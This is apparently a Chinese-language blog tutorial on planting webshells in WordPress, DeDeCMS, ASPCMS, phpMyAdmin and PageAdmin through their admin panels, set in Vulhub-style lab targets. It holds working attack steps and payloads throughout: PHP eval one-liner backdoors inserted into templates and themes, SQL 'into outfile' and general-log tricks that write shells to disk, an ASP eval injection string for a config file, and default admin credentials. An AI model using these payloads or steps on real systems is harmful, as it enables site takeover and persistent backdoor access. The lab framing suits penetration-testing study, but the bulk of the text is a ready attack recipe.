常见的cms框架的webshell方法

⼀:WordPress

后台修改模板拿WebShell

进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装

#执⾏命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

#靶场地址

word pass测试 ‹ Log In

思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外

观】 --》 【编辑】 --》 404.php

在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮

访问以下连接即可获取WebShell

#拼接路径

/wp-content/themes/twentyfifteen/404.php

http://8.140.254.245:8080//wp-content/themes/twentyfifteen/404.php

上传主题拿WebShell

接着上⼀个环境使⽤...将带有后⻔的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外

观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】

我们先在网上下载一个主题

https://downloads.wordpress.org/theme/pedro.2.0.5.zip

然后写一个一句话木马1.php放入到我们下载的压缩包里面

安装成功后访问主题下的⽹站后⻔⽂件.

#拼接路径

/wp-content/themes/pedro/1.php

⼆:DeDeCMS

通过⽂件管理器上传WebShell

访问⽬标靶场其思路为 dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传

php⽂件获取webshell...

前台

http://172.16.2.32/

#后台

http://172.16.2.32/dede

#信息

username:admin

password:admin

登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代

码上传...OK

上传我们的一句话木马

访问上传成功后的⽂件并使⽤蚁剑连接测试...

修改模板⽂件拿WebShell

与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 -

-》 【index.htm】 --> 【修改】 在⽂件修改中添加⼀句话代码....如下

点击 【⽣成】 --》 【更新主⻚HTML】 --》将主⻚位置修改为 【../index.php 】--》

点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化...

后台任意命令执⾏拿WebShell

点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添

加⼀句话代码--》点击 【确定】

然后访问我们的广告用蚁剑连接

通过后台sql命令执⾏拿webshell

.访问系统---sql命令⾏⼯具---执⾏ select @@ basedir,获取mysql路径,由此瑞测⽹站绝对路径

into outfile写⼊⼀句话⽊⻢

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php'

如果生成不了文件可以看看数据库的配置文件my.ini中的secure_file_priv=的值是否为空

然后访问我们生成的php文件用蚁剑连接

三:ASPCMS

后台修改配置⽂件拿Shell

访问以下地址为ASPCMS...并登陆到后台(这⾥注意在搭建站点的时候注意权限问题)

http://172.16.2.32:8080/admin_aspcms

#账户密码

username:admin

password:123456

点击 【扩展功能】 --》 【幻灯⽚设置】 --》点击 【保存】 --》开启代理进⾏抓包

在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进⾏发包查看被修改的asp

⽂件内容...

影响⽂件

/config/AspCms_Config.asp

#字段值

1%25><%25Eval(Request (chr(65)))%25><%25 密码是a

访问以下地址进⾏连接

http://172.16.2.32:8080/config/aspcms_config.asp

四:PhPMyadmin

导⼊导出拿WebShell

通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。

1.⾸先判断mysql位置

select @@datadir

2.猜测web路径

猜测web路径:D:\phpstudy_pro\www

3.写webshell

select "<?php @eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/phpMyAdmin4.8.5/2.php';

然后访问我们生成的php文件用蚁剑连接

界⾯图像化GetShell

phpmyadmin管理台

变量:⽇志 搜索:gen

log:on

file:D:/phpstudy_pro/WWW/phpMyAdmin4.8.5/1.php

sql:

select "<?php eval($_POST[cmd]);?>";

五:Pageadmin

上传模块拿WebShell

访问 pageadmin 在后台可以上传模板,把webshell打包成zip上传模板,系统会⾃动解压,

成功会在后台存在后⻔,访问即可获取webshell 。 点击【应⽤】--》【 插件安装】--》【 上传⽂件

这⾥因为不是授权版本,⽆法上传,如果有授权版本的话就可以成功上传,上传后系统会⾃动解压,直

接访问shell地址就可以了:/Templates/1/1.aspx

上传⽂件解压拿WebShell

点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】--》 【解压】

写一个asp的命令

访问我们上传的文件

相关推荐
阿华的代码王国2 分钟前
【Android】PopupWindow实现长按菜单
android·xml·java·前端·后端
稻草人不怕疼1 小时前
Android 15 全屏模式适配:A15TopView 自定义组件分享
android
静默的小猫1 小时前
LiveDataBus消息事件总线之二-(不含反射和hook)
android
~央千澈~2 小时前
05百融云策略引擎项目交付-laravel实战完整交付定义常量分文件配置-独立建立lib类处理-成功导出pdf-优雅草卓伊凡
android·laravel·软件开发·金融策略
_一条咸鱼_3 小时前
Android Runtime冷启动与热启动差异源码级分析(99)
android·面试·android jetpack
用户2018792831673 小时前
Java序列化之幽灵船“Serial号”与永生契约
android·java
用户2018792831673 小时前
“对象永生”的奇幻故事
android·java
枷锁—sha4 小时前
【BUUCTF系列】[HCTF 2018]WarmUp1
android·网络·web安全·网络安全
梦想改变生活5 小时前
《Flutter篇第二章》MasonryGridView瀑布流列表
android·flutter
杨航 AI5 小时前
PHP 5.5 Action Management with Parameters (English Version)
android·开发语言·php